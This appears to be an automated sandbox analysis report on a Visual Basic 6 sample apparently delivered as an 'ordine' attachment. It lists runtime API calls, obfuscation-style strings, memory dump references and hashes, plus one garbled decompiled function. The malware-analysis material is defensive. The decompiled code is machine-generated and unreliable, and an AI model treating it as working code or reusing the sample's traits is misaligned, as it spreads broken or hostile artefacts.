0x0040f66a
0x0040f66b
0x0040f66d
0x0040f66d
0x0040f670
0x0040f674
0x0040f677
0x0040f67d
0x0040f682
0x0040f683
0x0040f686
0x0040f687
0x0040f689
0x0040f68c
0x0040f68d
0x0040f690
0x00000000
0x00000000
0x0040f692
0x0040f693
0x0040f695
0x0040f698
0x00000000
0x00000000
0x0040f69b
0x0040f69e
0x0040f6a1
0x0040f6a4
0x0040f6a7
0x0040f6ad
0x0040f6b5
0x0040f6b8
0x0040f6bc
0x0040f6c5
0x0040f6c8
0x0040f6ca
0x0040f6cb
0x0040f6d1
0x0040f6d7
0x0040f6df
0x0040f6e2
0x0040f6e3
0x0040f6e9
0x0040f6ec
0x0040f6ef
0x00000000
0x0040f6ef
0x0040f6f5
0x0040f6f8
0x0040f6fb
0x0040f701
0x0040f709
0x0040f70c
0x0040f710
0x0040f715
0x0040f718
0x0040f71e
0x0040f71f
0x0040f71f
0x0040f726
0x0040f78d
0x0040f78d
0x0040f78e
0x0040f78f
0x0040f790
0x0040f791
0x0040f792
0x0040f794
0x0040f796
0x0040f796
0x0040f798
0x0040f79a
0x0040f79a
0x0040f79c
0x0040f79d
0x0040f811
0x0040f811
0x00000000
0x0040f79f
0x0040f79f
0x0040f7a0
0x0040f7a2
0x0040f7a3
0x0040f812
0x0040f812
0x0040f814
0x0040f815
0x0040f81d
0x0040f81e
0x0040f81f
0x0040f856
0x0040f856
0x0040f858
0x0040f858
0x0040f8c8
0x0040f8c8
0x0040f8c9
0x0040f8ca
0x0040f8ca
0x0040f8cd
0x0040f8da
0x0040f8dd
0x0040f8e0
0x0040f8e2
0x0040f8e8
0x0040f8e9
0x0040f8eb
0x0040f8ed
0x0040f8ef
0x0040f8f1
0x0040f8f3
0x0040f8fd
0x0040f8fd
0x0040f8ff
0x0040f905
0x0040f905
0x0040f90c
0x0040f90c
0x0040f8f5
0x0040f8f7
0x0040f8fa
0x0040f8fb
0x00000000
0x0040f8fb
0x0040f85a
0x0040f85e
0x0040f85f
0x0040f85f
0x0040f863
0x00000000
0x00000000
0x0040f865
0x0040f867
0x0040f867
0x0040f86a
0x0040f86d
0x0040f870
0x0040f872
0x0040f873
0x0040f873
0x0040f876
0x0040f877
0x0040f87a
0x0040f87a
0x0040f823
0x0040f823
0x0040f823
0x0040f826
0x0040f829
0x0040f82a
0x0040f89e
0x0040f89e
0x0040f8a4
0x0040f8a7
0x0040f8a7
0x0040f8aa
0x0040f8b5
0x0040f8b6
0x0040f8c2
0x0040f8c3
0x0040f8c5
0x0040f8c7
0x00000000
0x0040f8c7
0x0040f82c
0x0040f82d
0x0040f897
0x00000000
0x00000000
0x0040f899
0x0040f89a
0x00000000
0x00000000
0x0040f89c
0x0040f89d
0x00000000
0x0040f89d
0x0040f82f
0x0040f832
0x0040f832
0x0040f834
0x0040f834
0x0040f835
0x00000000
0x00000000
0x0040f837
0x0040f83b
0x0040f83b
0x00000000
0x00000000
0x0040f83e
0x0040f83f
0x0040f841
0x0040f841
0x0040f842
0x0040f843
0x0040f844
0x0040f845
0x0040f84a
0x0040f851
0x0040f854
0x0040f854
0x00000000
0x0040f854
0x0040f7a5
0x00000000
0x00000000
0x0040f7a8
0x0040f7a9
0x0040f7ad
0x0040f7af
0x0040f7b1
0x0040f7b2
0x0040f7b4
0x0040f7b5
0x0040f7b6
0x0040f7b7
0x0040f7b8
0x0040f7b9
0x0040f7ba
0x0040f7bb
0x0040f7bc
0x0040f7be
0x0040f7c0
0x00000000
0x00000000
0x0040f7c2
0x0040f7c2
0x0040f7c3
0x0040f7c5
0x0040f7ca
0x00000000
0x00000000
0x0040f7cd
0x0040f7cd
0x0040f7d0
0x00000000
0x00000000
0x0040f7d2
0x0040f7d3
0x0040f7d4
0x00000000
0x00000000
0x0040f7d6
0x0040f7d9
0x0040f7db
0x0040f7db
0x0040f7de
0x0040f7e0
0x0040f7e1
0x0040f7e2
0x00000000
0x0040f7e5
0x0040f7e5
0x0040f7e7
0x0040f7f2
0x0040f7f5
0x0040f7f6
0x0040f7f8
0x0040f7fa
0x0040f7fc
0x0040f7fd
0x0040f7fe
0x0040f800
0x0040f800
0x0040f801
0x0040f802
0x0040f803
0x0040f804
0x00000000
0x00000000
0x0040f806
0x00000000
0x00000000
0x0040f808
0x0040f80a
0x0040f80c
0x0040f80e
0x00000000
0x0040f810
0x0040f810
0x00000000
0x0040f810
0x0040f80e
0x0040f7e2
0x0040f79d
0x0040f728
0x0040f72c
0x0040f72e
0x0040f730
0x0040f733
0x00000000
0x00000000
0x0040f735
0x0040f736
0x0040f73d
0x0040f73f
0x0040f73f
0x0040f742
0x0040f743
0x0040f746
0x00000000
0x00000000
0x0040f748
0x0040f74a
0x0040f74c
0x0040f74d
0x0040f750
0x0040f754
0x0040f756
0x0040f758
0x00000000
0x00000000
0x0040f761
0x0040f762
0x0040f769
0x0040f770
0x0040f774
0x0040f775
0x0040f776
0x0040f77d
0x0040f77f
0x0040f782
0x0040f783
0x0040f785
0x0040f786
0x0040f788
0x0040f789
0x0040f78b
0x0040f78b
0x0040f78b
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DA30,00416364,?,?,?,?,004013F6), ref: 0040F919
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040F97E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040F9E0
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040FA08
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FA27
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA63
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001D0), ref: 0040FAB0

Strings

1N, xrefs: 00411110, 00411116
), xrefs: 004125AE
AFDELINGSCHEFERS, xrefs: 00410CD4
@B0%, xrefs: 0041102A
dcA, xrefs: 0040F934
aQ, xrefs: 00411598
ALUMIUM, xrefs: 004105E9
ANTNDELSEN, xrefs: 004108A9
chaccon, xrefs: 00411787
Tudemikkel, xrefs: 00410A4C
Audiometry, xrefs: 00411782
Zubeneschamali, xrefs: 004105E4
Haandbremser6, xrefs: 004112D1
dcA, xrefs: 0040FDF1
dcA, xrefs: 0040F907
dcA, xrefs: 0040FCE3
5D, xrefs: 00411B8C

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free
String ID: )$5D$@B0%$AFDELINGSCHEFERS$ALUMIUM$ANTNDELSEN$Audiometry$Haandbremser6$Tudemikkel$Zubeneschamali$aQ$chaccon$dcA$dcA$dcA$dcA$1N
API String ID: 4269135739-1794618918
Opcode ID: 31dd3b43d295646846f60cad14cbe20ced5d7ba8a6890d60d2cb563e936d86ac
Instruction ID: 92c42b2245208dc41c3fc880fbe25f0a7b5ea5ceeeb71dac2977407e590978ed
Opcode Fuzzy Hash: 31dd3b43d295646846f60cad14cbe20ced5d7ba8a6890d60d2cb563e936d86ac
Instruction Fuzzy Hash: AB431D75940219AFCB21EF50CD49BD9BBB4BB08304F1041EAE10ABB1A1DB799EC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8A4, Relevance: 394.5, APIs: 208, Strings: 16, Instructions: 2541
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040F8A4(signed int _a4, intOrPtr _a23, void* _a758) {
				void* _v3;
				intOrPtr _v8;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				void* _v52;
				void* _v324;
				void* _v332;
				void* _v344;
				void* _v348;
				void* _v356;
				void* _v360;
				void* _v384;
				void* _v388;
				void* _v392;
				void* _v396;
				void* _v432;
				void* _v436;
				void* _v444;
				void* _v448;
				void* _v452;
				void* _v472;
				void* _v476;
				void* _v480;
				void* _v492;
				void* _v500;
				void* _v504;
				void* _v508;
				void* _v516;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				void* _v540;
				void* _v548;
				void* _v556;
				void* _v564;
				void* _v572;
				void* _v580;
				void* _v588;
				void* _v596;
				void* _v604;
				void* _v612;
				void* _v620;
				void* _v628;
				void* _v636;
				void* _v644;
				void* _v664;
				void* _v668;
				void* _v672;
				void* _v676;
				void* _v680;
				void* _v684;
				void* _v688;
				void* _v692;
				void* _v696;
				void* _v700;
				void* _v712;
				void* _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v756;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v904;
				void* _v908;
				void* _v912;
				void* _v936;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* _v968;
				void* _v972;
				void* _v976;
				void* _v980;
				void* _v984;
				void* _v988;
				void* _v992;
				void* _v996;
				void* _v1000;
				void* _v1004;
				void* _v1008;
				void* _v1012;
				void* _v1016;
				void* _v1020;
				void* _v1024;
				void* _v1028;
				void* _v1032;
				void* _v1036;
				void* _v1040;
				void* _v1044;
				void* _v1048;
				void* _v1052;
				void* _v1056;
				void* _v1060;
				void* _v1064;
				void* _v1068;
				void* _v1072;
				void* _v1076;
				void* _v1080;
				void* _v1084;
				void* _v1088;
				void* _v1092;
				void* _v1096;
				void* _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1116;
				void* _v1120;
				void* _v1124;
				void* _v1128;
				void* _v1132;
				void* _v1136;
				void* _v1140;
				void* _v1144;
				void* _v1148;
				void* _v1152;
				void* _v1156;
				void* _v1160;
				void* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1176;
				void* _v1180;
				void* _v1184;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				void* _v1212;
				void* _v1216;
				void* _v1220;
				void* _v1224;
				void* _v1228;
				void* _v1232;
				void* _v1236;
				void* _v1240;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1260;
				void* _v1264;
				void* _v1268;
				void* _v1272;
				void* _v1276;
				void* _v1280;
				void* _v1284;
				void* _v1288;
				void* _v1292;
				void* _v1296;
				void* _v1300;
				void* _v1304;
				void* _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				void* _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				void* _v1340;
				void* _v1344;
				void* _v1348;
				void* _v1352;
				signed int _t1284;
				signed int _t1285;
				signed int _t1286;
				void* _t1841;
				intOrPtr* _t1842;
				void* _t1843;
				signed char _t1844;
				void* _t1988;
				void* _t2002;
				intOrPtr _t2003;

				_t2003 = _t2002 - 0x18;
				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t2003;
				L004013F0();
				 *_t1842 =  *_t1842 - _t1842;
				asm("invalid");
				_push(_t1842);
				_v28 = _t2003;
				_v24 = 0x401110;
				_v20 = _a4 & 0x00000001;
				_t1284 = _a4;
				_t1285 = _t1284 & 0xfffffffe;
				 *((char*)(_t1844 + 0x45c70845)) =  *((char*)(_t1844 + 0x45c70845)) - 1;
				asm("hlt");
				 *_t1285 =  *_t1285 + _t1285;
				 *_t1285 =  *_t1285 + _t1285;
				_t1286 = _a4;
				 *(_t1842 + 0x875ff00) =  *(_t1842 + 0x875ff00) | _t1844;
				_t1843 = _t1842 + _t1842;
				if(_t1843 == 0) {
					_t1841 =  *((intOrPtr*)(_t1286 + 4))();
					_t1286 = _t1841 + 0xc7;
					asm("cld");
					 *_t1286 =  *_t1286 + _t1286;
				}
				 *_t1286 =  *_t1286 + _t1286;
				_v8 = 2;
				 *((intOrPtr*)(_t1843 + 0x4163643d)) =  *((intOrPtr*)(_t1843 + 0x4163643d)) + _t1286;
				_a23 = _a23 + _t1988;
			}

0x0040f8a7
0x0040f8aa
0x0040f8b5
0x0040f8b6
0x0040f8c2
0x0040f8c3
0x0040f8c5
0x0040f8c7
0x0040f8ca
0x0040f8cd
0x0040f8da
0x0040f8dd
0x0040f8e0
0x0040f8e2
0x0040f8e8
0x0040f8e9
0x0040f8eb
0x0040f8ed
0x0040f8ef
0x0040f8f1
0x0040f8f3
0x0040f8f5
0x0040f8f7
0x0040f8fa
0x0040f8fb
0x0040f8fb
0x0040f8fd
0x0040f8ff
0x0040f905
0x0040f90c

APIs

__vbaChkstk.MSVBVM60(?,004013F6), ref: 0040F8C2
__vbaNew2.MSVBVM60(0040DA30,00416364,?,?,?,?,004013F6), ref: 0040F919
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040F97E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040F9E0
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000118), ref: 0040FA08
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FA27
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA63
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001D0), ref: 0040FAB0
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FAD7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB13
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB5D
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB71
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040FB85
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000204,?,?,00000000), ref: 0040FBF4
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0040FC18
__vbaRecUniToAnsi.MSVBVM60(0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC3C
__vbaStrToAnsi.MSVBVM60(?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC4E
__vbaSetSystemError.MSVBVM60(00000000,?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC5F
__vbaRecAnsiToUni.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000,?,?,004013F6), ref: 0040FC77
__vbaFreeStr.MSVBVM60 ref: 0040FC9A
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 0040FCC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040FD2D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 0040FD8F
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 0040FDB7
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 0040FDD6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA20,00000014), ref: 0040FE3B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 0040FE9D
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 0040FEC5
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FEE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA68,00000160), ref: 0040FF6D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D230,0000015C), ref: 0040FFB9
__vbaFreeObj.MSVBVM60(00000000,?,0040D230,0000015C), ref: 0040FFD3
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0040FFF2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041002E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000160), ref: 0041007B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004100A0
__vbaI4Var.MSVBVM60(?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100B3
__vbaSetSystemError.MSVBVM60(00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100C4
__vbaNew2.MSVBVM60(0040DE54,00416010,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004100DC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410118
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA88,000000F0), ref: 00410165
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004101AA
__vbaFreeVar.MSVBVM60(?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101B8
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101D1
__vbaOnError.MSVBVM60(000000FF,000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101DF
#568.MSVBVM60(000000C4,000000FF,000000FF,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004101F7
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 0041021C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410258
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA98,00000150), ref: 004102A5
__vbaSetSystemError.MSVBVM60(?), ref: 004102CA
__vbaFreeObj.MSVBVM60(?), ref: 004102ED
#611.MSVBVM60(?), ref: 00410308
__vbaStrMove.MSVBVM60(?), ref: 00410315
#554.MSVBVM60(?), ref: 00410321
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00410340
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041037C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAA8,00000190), ref: 004103C9
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004103EE
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 004103F7
__vbaStrMove.MSVBVM60(00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000,?,?,004013F6), ref: 00410404
#531.MSVBVM60(00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 0041040A
__vbaFreeStr.MSVBVM60(00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 00410415
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?), ref: 0041042A
__vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 00410438
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00410457
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?), ref: 00410493
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAB8,00000088,?,?,?,?), ref: 004104E0
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?), ref: 00410507
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?), ref: 00410543
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000160,?,?,?,?,?,?), ref: 00410590
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?), ref: 004105B5
__vbaI4Var.MSVBVM60(?,ALUMIUM,Zubeneschamali,?), ref: 004105F5
__vbaHresultCheckObj.MSVBVM60(?,?,0040D260,00000704,?,00000000,?,ALUMIUM,Zubeneschamali,?), ref: 00410641
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041066C
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,?,?,0040D540,?,?,00000000), ref: 0041067A
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,00000000,?,?,0040D540,?), ref: 00410699
__vbaObjSet.MSVBVM60(?,00000000), ref: 004106D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000190), ref: 00410722
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,00000700,?,?,?,?,?), ref: 004107AA
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004107DC
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 004107FB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00410837
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000048,?,?,?,?,?), ref: 0041087E
__vbaFreeStr.MSVBVM60(?,?,?,?,?), ref: 004108C2
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 004108CD
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 004108EC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00410928
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000160,?,?,?,?,?), ref: 00410975
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?), ref: 0041099C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 004109D8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040D96C,00000188,?,?,?,?,?,?,?), ref: 00410A25
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,0000070C,?,00002F77,00753E95,004BC285,?,Tudemikkel,?,?,?,?,?,?), ref: 00410AAA
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00002F77,00753E95,004BC285,?,Tudemikkel,?,?,?,?,?,?,?), ref: 00410ACE
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00410AF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410B2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA68,00000058), ref: 00410B73
__vbaFreeObj.MSVBVM60 ref: 00410BD1
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00410BF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410C2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,00000048), ref: 00410C73
__vbaStrMove.MSVBVM60(00000000,?,0040D96C,00000048), ref: 00410CB0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,000006F8,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D1B
__vbaFreeStr.MSVBVM60(?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D4D
__vbaFreeObj.MSVBVM60(?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D58
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410D77
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410DB3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB64,00000078,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410DFA
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410E21
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410E5D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA88,000000F0,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410EAA
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410ED1
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB74,000000A0,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F5A
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F81
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410FBD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,00000158,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 0041100A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,00000704,?,0057F7D0,00000000,?,?,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?), ref: 0041109D
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,?,0057F7D0,00000000,?,?,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0), ref: 004110C1
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 004110E7
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411152
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041118E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001C0), ref: 004111DB
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411202
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041123E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,000000F8), ref: 0041128B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004112B0
__vbaI4Var.MSVBVM60(00000000), ref: 004112B9
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0040DE54,00416010,?,0040DE54,00416010), ref: 004112EA
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00411306
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DE54,00416010), ref: 00411314
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411333
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041136F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB74,00000150), ref: 004113BC
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004113E3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041141F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAB8,000002A8), ref: 0041146C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004114BB
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004114D3
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004114F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411531
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA98,00000068), ref: 00411578
__vbaFreeObj.MSVBVM60 ref: 004115D6
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004115F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411631
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000190), ref: 0041167E
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004116A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004116E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA88,000000D0), ref: 0041172E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411753
__vbaI4Var.MSVBVM60(?,chaccon,Audiometry,?), ref: 00411793
__vbaHresultCheckObj.MSVBVM60(?,?,0040D260,00000704,?,00000000,?,chaccon,Audiometry,?), ref: 004117E0
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041180B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,0040DE54,00416010,?,?,?,?,0040DE54,00416010), ref: 00411819
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411838
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411874
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000068), ref: 004118BB
__vbaFreeObj.MSVBVM60 ref: 0041192E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D230,000002B4), ref: 004119CB

Strings

1N, xrefs: 00411110, 00411116
AFDELINGSCHEFERS, xrefs: 00410CD4
@B0%, xrefs: 0041102A
dcA, xrefs: 0040F934
aQ, xrefs: 00411598
ALUMIUM, xrefs: 004105E9
ANTNDELSEN, xrefs: 004108A9
chaccon, xrefs: 00411787
Tudemikkel, xrefs: 00410A4C
Audiometry, xrefs: 00411782
Zubeneschamali, xrefs: 004105E4
Haandbremser6, xrefs: 004112D1
dcA, xrefs: 0040FDF1
*, xrefs: 004125BA
dcA, xrefs: 0040FCE3
5D, xrefs: 00411B8C

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$New2$List$CallErrorLate$ChkstkMove$AnsiSystem$#531#554#568#611
String ID: *$5D$@B0%$AFDELINGSCHEFERS$ALUMIUM$ANTNDELSEN$Audiometry$Haandbremser6$Tudemikkel$Zubeneschamali$aQ$chaccon$dcA$dcA$dcA$1N
API String ID: 1479439471-1073206757
